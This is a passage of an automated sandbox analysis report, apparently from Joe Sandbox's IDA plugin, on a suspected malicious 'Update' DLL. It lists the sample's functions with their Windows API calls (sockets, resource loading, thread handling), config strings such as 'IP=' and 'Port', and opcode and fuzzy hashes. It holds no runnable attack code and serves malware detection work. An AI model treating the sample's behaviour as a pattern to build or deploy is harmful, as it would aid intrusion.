                                              • Opcode ID: 79073c275184f348c58e27ccbb2125a9a6784724f6459cdf8d54aed389891215
                                              • Instruction ID: 40a23cc354e860c1cf153a3d35324111a4bd7250e5eafe522513ffec18880ffc
                                              • Opcode Fuzzy Hash: 79073c275184f348c58e27ccbb2125a9a6784724f6459cdf8d54aed389891215
                                              • Instruction Fuzzy Hash: A7015AB4A01B80DFDBA0DFB58905B49BAF4BB4A704F40492EE54ADBF90E7B4A014CF04
                                              APIs
                                              • ___set_flsgetvalue.LIBCMT ref: 0432F9CA
                                                • Part of subcall function 04333CA0: TlsGetValue.KERNEL32(00000000,04333DF9,?,04334500,00000000,00000001,00000000,?,04338DE6,00000018,04346448,0000000C,04338E76,00000000,00000000), ref: 04333CA9
                                                • Part of subcall function 04333CA0: DecodePointer.KERNEL32(?,04334500,00000000,00000001,00000000,?,04338DE6,00000018,04346448,0000000C,04338E76,00000000,00000000,?,04333F06,0000000D), ref: 04333CBB
                                                • Part of subcall function 04333CA0: TlsSetValue.KERNEL32(00000000,?,04334500,00000000,00000001,00000000,?,04338DE6,00000018,04346448,0000000C,04338E76,00000000,00000000,?,04333F06), ref: 04333CCA
                                              • ___fls_getvalue@4.LIBCMT ref: 0432F9D5
                                                • Part of subcall function 04333C80: TlsGetValue.KERNEL32(?,?,0432F9DA,00000000), ref: 04333C8E
                                              • ___fls_setvalue@8.LIBCMT ref: 0432F9E8
                                                • Part of subcall function 04333CD4: DecodePointer.KERNEL32(?,?,?,0432F9ED,00000000,?,00000000), ref: 04333CE5
                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 0432F9F1
                                              • ExitThread.KERNEL32 ref: 0432F9F8
                                              • GetCurrentThreadId.KERNEL32 ref: 0432F9FE
                                              • __freefls@4.LIBCMT ref: 0432FA1E
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                              • String ID:
                                              • API String ID: 2383549826-0
                                              • Opcode ID: b975a750568b2c31a01042f403b35c2540b9a163b5069e7b9e3153535350b269
                                              • Instruction ID: 7e3f7a2d5051fbbf6d26d48362043cc1e126ac2c389d1513d6269016f3da25a9
                                              • Opcode Fuzzy Hash: b975a750568b2c31a01042f403b35c2540b9a163b5069e7b9e3153535350b269
                                              • Instruction Fuzzy Hash: 76F06278500710BBD708BF70C60885E7BACEF8824A711E558F90997201DA38F841DB91
                                              APIs
                                              • ___set_flsgetvalue.LIBCMT ref: 100071BC
                                                • Part of subcall function 10009754: TlsGetValue.KERNEL32(00000000,100098AD,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000), ref: 1000975D
                                                • Part of subcall function 10009754: DecodePointer.KERNEL32(?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA,0000000D), ref: 1000976F
                                                • Part of subcall function 10009754: TlsSetValue.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 1000977E
                                              • ___fls_getvalue@4.LIBCMT ref: 100071C7
                                                • Part of subcall function 10009734: TlsGetValue.KERNEL32(?,?,100071CC,00000000), ref: 10009742
                                              • ___fls_setvalue@8.LIBCMT ref: 100071DA
                                                • Part of subcall function 10009788: DecodePointer.KERNEL32(?,?,?,100071DF,00000000,?,00000000), ref: 10009799
                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 100071E3
                                              • ExitThread.KERNEL32 ref: 100071EA
                                              • GetCurrentThreadId.KERNEL32 ref: 100071F0
                                              • __freefls@4.LIBCMT ref: 10007210
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                              • String ID:
                                              • API String ID: 2383549826-0
                                              • Opcode ID: 9534965ccca21370a2365faca07fc43a5bbbcb8b41f594eb418147c089430495
                                              • Instruction ID: 9ef8d05c11a244158b1ee883055881acaa61a2209176cdde4bb0df2a080a06ba
                                              • Opcode Fuzzy Hash: 9534965ccca21370a2365faca07fc43a5bbbcb8b41f594eb418147c089430495
                                              • Instruction Fuzzy Hash: 7EF09679404240ABF304DFB5C94988E7BA9FF482C4725C458F90C8B21BDB39E8428790
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 977c78c5da6c3e7803641d44e15b4456599066931e3b90d8b284905396db56d7
                                              • Instruction ID: d9aa1c353fb3240bb6aa6f22149a18889d1fb17a4d97ccd0be597c4bda10a8f0
                                              • Opcode Fuzzy Hash: 977c78c5da6c3e7803641d44e15b4456599066931e3b90d8b284905396db56d7
                                              • Instruction Fuzzy Hash: 8EB12571B04249AFDF01CF99C885BADBBB8BF4A31CF144248E4529BB81C7799941CFA1
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: _strlen
                                              • String ID: IP=$Port
                                              • API String ID: 4218353326-1046961985
                                              • Opcode ID: 0ede795bbe29cefcfbf973872d759c9032f4d7c321d052f4991e6b2cfff48713
                                              • Instruction ID: 3b948db3bc1f1bc2d8f671fd5d11e6e1af50964c8afb1583bcf719c628be3afd
                                              • Opcode Fuzzy Hash: 0ede795bbe29cefcfbf973872d759c9032f4d7c321d052f4991e6b2cfff48713
                                              • Instruction Fuzzy Hash: 55F1D7B2A047008BD720CF34C894BA7B7F6BF95318F154A2DE59A87B50E735F5498B42
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 100032F1
                                              • Sleep.KERNEL32(00000258), ref: 100032FE
                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 10003306
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10003312
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000331A
                                              • Sleep.KERNEL32(0000012C), ref: 1000332B
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                              • String ID:
                                              • API String ID: 3137405945-0
                                              • Opcode ID: 90501a451cf47964b750dce1617d56ac3a73a9eb1c931f81fede124cf76ff774
                                              • Instruction ID: f89297930b1253133b9af3f62c08b225611c8876bcc0692efb07df5bac526d50
                                              • Opcode Fuzzy Hash: 90501a451cf47964b750dce1617d56ac3a73a9eb1c931f81fede124cf76ff774
                                              • Instruction Fuzzy Hash: 65F08971104314AFD610DBE9CCC4D46F3B8AF89331B144709F221872D0CAB1E8018BA0
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 0432669B
                                              • CoCreateInstance.OLE32(043446FC,00000000,00000001,0434471C,?,?,?,?,?,?,?,?,?,?,0432588A), ref: 043266B2
                                              • SysFreeString.OLEAUT32(?), ref: 0432674C
                                              • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,0432588A), ref: 0432677D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: CreateFreeInitializeInstanceStringUninitialize
                                              • String ID: FriendlyName
                                              • API String ID: 841178590-3623505368
                                              • Opcode ID: 32fe3563375919256fcfa46ed15928587fd8c34170924fd2460b61f078b12ae2
                                              • Instruction ID: 484bfab122591a234312c625c700b396d17fde385f5ed79c16c88fdcbc2036bb
                                              • Opcode Fuzzy Hash: 32fe3563375919256fcfa46ed15928587fd8c34170924fd2460b61f078b12ae2
                                              • Instruction Fuzzy Hash: 2C311979700209AFDB00DA99DC81EAEB7B9EFC8704F149599F504EB250DA71FD02CB60
                                              APIs
                                              • _malloc.LIBCMT ref: 0432F721
                                                • Part of subcall function 0432F673: __FF_MSGBANNER.LIBCMT ref: 0432F68C
                                                • Part of subcall function 0432F673: __NMSG_WRITE.LIBCMT ref: 0432F693
                                                • Part of subcall function 0432F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,04334500,00000000,00000001,00000000,?,04338DE6,00000018,04346448,0000000C,04338E76), ref: 0432F6B8
                                              • std::exception::exception.LIBCMT ref: 0432F756
                                              • std::exception::exception.LIBCMT ref: 0432F770
                                              • __CxxThrowException@8.LIBCMT ref: 0432F781
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                              • String ID: bad allocation
                                              • API String ID: 615853336-2104205924
                                              • Opcode ID: c61199134cc7f539fc213d1dc55980065a2a33df9684c40b45a03a6574800a74
                                              • Instruction ID: e4ff924f5bf1b1501fbed4a46d5a5e18a54546a9269d6a5f285e947548d9ad77
                                              • Opcode Fuzzy Hash: c61199134cc7f539fc213d1dc55980065a2a33df9684c40b45a03a6574800a74
                                              • Instruction Fuzzy Hash: FDF0F4749002296BFB00EB58DE25AEF7AB8EF85798F143159E404E6190DFB0FA009B80
                                              APIs
                                              • GetCommandLineW.KERNEL32(00000001), ref: 00221C61
                                              • CommandLineToArgvW.SHELL32(00000000), ref: 00221C68
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00220000), ref: 00221CD3
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 00221CF3
                                              • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,00220000,00000000,00000000,00000000,00222778,00000014), ref: 00221D25
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3548588453.0000000000221000.00000020.00000001.01000000.00000005.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000003.00000002.3548541401.0000000000220000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000003.00000002.3548624115.0000000000222000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000003.00000002.3548649924.0000000000223000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000003.00000002.3548676740.0000000000224000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000003.00000002.3548676740.0000000000266000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_220000_Update.jbxd
                                              Similarity
                                              • API ID: ByteCharCommandLineMultiWide$ArgvFreeLocal
                                              • String ID:
                                              • API String ID: 4060259846-0
                                              • Opcode ID: 75d9453584fc0b3b64f5e5354220c8efcebe9b8775368668d65a88d3c8218a58
                                              • Instruction ID: 8259c16b1a8d907bc58b9bd26433447f869acba04d182d644392de1d435330d1
                                              • Opcode Fuzzy Hash: 75d9453584fc0b3b64f5e5354220c8efcebe9b8775368668d65a88d3c8218a58
                                              • Instruction Fuzzy Hash: 2331B070604315FBE720EFA8AC45F1B77E4EFA4711F10092DF955972D0D631AE298B62
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: dllmain_raw$dllmain_crt_dispatch
                                              • String ID:
                                              • API String ID: 3136044242-0
                                              • Opcode ID: 94fbf4296e8f1b7b42ff85a5754d9f30a7e2bdce3e97d20c19ac1e42743777b2
                                              • Instruction ID: 619d5cc7811372493d70ff8b0388e624dbb137f4af6c33d6795cafb6ed3495e4
                                              • Opcode Fuzzy Hash: 94fbf4296e8f1b7b42ff85a5754d9f30a7e2bdce3e97d20c19ac1e42743777b2
                                              • Instruction Fuzzy Hash: D7218173F01619ABCB218E55CC40AAF3A79EB85B9CF114165FC156FB20C7328E058FA0
                                              APIs
                                              • GetModuleHandleA.KERNEL32(?), ref: 6C1C5049
                                              • FindResourceW.KERNEL32(00000000,?,?), ref: 6C1C5090
                                              • LoadResource.KERNEL32(00000000,00000000,?,?), ref: 6C1C509E
                                              • SizeofResource.KERNEL32(00000000,00000000,?,?), ref: 6C1C50A8
                                              • LockResource.KERNEL32(00000000,?,?), ref: 6C1C50B1
                                                • Part of subcall function 6C1C40A8: _strlen.LIBCMT ref: 6C1C4131
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Resource$FindHandleLoadLockModuleSizeof_strlen
                                              • String ID:
                                              • API String ID: 415223560-0
                                              • Opcode ID: 6e26f122de6682cdd5e82956f363162eb849734217ae36e91c9a569e1cfee014
                                              • Instruction ID: e6e2274113b126ed3a5db81b3be06ed799149c0b7b6ece576aad02ddbd94197a
                                              • Opcode Fuzzy Hash: 6e26f122de6682cdd5e82956f363162eb849734217ae36e91c9a569e1cfee014
                                              • Instruction Fuzzy Hash: DB1182F1A013409FE7015B348C08AAB37BCEF66218B149164F94A8A212FB79D959C7A6
                                              APIs
                                              • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 10002D3C
                                              • CancelIo.KERNEL32(?), ref: 10002D46
                                              • InterlockedExchange.KERNEL32(00000000,00000000), ref: 10002D4F
                                              • closesocket.WS2_32(?), ref: 10002D59
                                              • SetEvent.KERNEL32(00000001), ref: 10002D63
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                              • String ID:
                                              • API String ID: 1486965892-0
                                              • Opcode ID: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
                                              • Instruction ID: c3dd280d0a222891198d8956340d5cd90ea8efbda93af296f9b36197db09124c
                                              • Opcode Fuzzy Hash: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
                                              • Instruction Fuzzy Hash: 95F04F75100710EFE320DF94CC89F5677B8FB49B12F148659F6829B690C7B1F9048BA0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: FileModuleName_strlen
                                              • String ID: Upda$dll$te.d
                                              • API String ID: 2404361900-2264352279
                                              • Opcode ID: a21a6e1d4985a8cacc89f0cf39226a887d3c8509f1c050606ecb84a9d7e8fc88
                                              • Instruction ID: 0b5afef6c93efe0abaa69efad398a2174a7aad6072f9e3d3bd8d7a129b491b2a
                                              • Opcode Fuzzy Hash: a21a6e1d4985a8cacc89f0cf39226a887d3c8509f1c050606ecb84a9d7e8fc88
                                              • Instruction Fuzzy Hash: E131D3B1E013489FEB10CFA4C985BFEBBB9FF11304F104519E851AB641D778AA48CB92
                                              APIs
                                              • GetModuleHandleW.KERNEL32(Shell32,?,?,6C1C7CE7,YSS.AppID.NoVersion,00000000,?,00000000,?,00000000,6C1C8345,?), ref: 6C1E3A42
                                              • GetProcAddress.KERNEL32(00000000,SetCurrentProcessExplicitAppUserModelID), ref: 6C1E3A53
                                              Strings
                                              • SetCurrentProcessExplicitAppUserModelID, xrefs: 6C1E3A4D
                                              • Shell32, xrefs: 6C1E3A3B
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: SetCurrentProcessExplicitAppUserModelID$Shell32
                                              • API String ID: 1646373207-2658420654
                                              • Opcode ID: e646e4c98e87590e0d08f715a304836e410982fa928d1a210d750b44b69e3fbf
                                              • Instruction ID: 1db1225479ae963eea2d00e69b60307ea90cf185263038fb380f995a8ccb7b86
                                              • Opcode Fuzzy Hash: e646e4c98e87590e0d08f715a304836e410982fa928d1a210d750b44b69e3fbf
                                              • Instruction Fuzzy Hash: EBE08635702B25678E255B65D858C9F7F6CDB966B1300043EF906D7B00CE34D801CBE4
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 036123bd63a2718ae53cbdc5a83dbc76eaeb2b2a790b9afc75c2513ef707261d
                                              • Instruction ID: 0b5cb29c9fa64d503c1993b9e378e59b4e3126d4af8bf83cf3bb10eaa29261a1
                                              • Opcode Fuzzy Hash: 036123bd63a2718ae53cbdc5a83dbc76eaeb2b2a790b9afc75c2513ef707261d
                                              • Instruction Fuzzy Hash: 468134B1E001148FDB14CF68CC947EDB7B6EF66318F154229F811A7780EB78AD858B92
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: _strlen$Sleep
                                              • String ID:
                                              • API String ID: 2737124692-0
                                              • Opcode ID: ee87e6551f7402e9cf764df978d1baa8065ac2e2e5b9b4e44dadd02bbfdbf465
                                              • Instruction ID: 8b2d8ed9e11af7ed4f2ff4bb5b471ba0791fb1294f9b55bf533144d9ae26c454
                                              • Opcode Fuzzy Hash: ee87e6551f7402e9cf764df978d1baa8065ac2e2e5b9b4e44dadd02bbfdbf465
                                              • Instruction Fuzzy Hash: A071F7B2E012189BCB10CFB4DC807DE7BB6BF65314F150225F858A7B80F7399A448B92
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 6C1D2833
                                                • Part of subcall function 6C1E1666: __EH_prolog3.LIBCMT ref: 6C1E166D
                                              • GetCurrentThread.KERNEL32 ref: 6C1D2892
                                              • GetCurrentThreadId.KERNEL32 ref: 6C1D289B
                                              • GetVersionExW.KERNEL32 ref: 6C1D2937
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: CurrentThread$H_prolog3H_prolog3_Version
                                              • String ID:
                                              • API String ID: 786120064-0
                                              • Opcode ID: 0176463f1efdd890d9640323524718fc8bd7167f12827d9be406da0d1c599aaa
                                              • Instruction ID: b71f66de41fb46042fd65d5ef18eab8f3f78ccacbe7b3cfed85271dd41b21a66
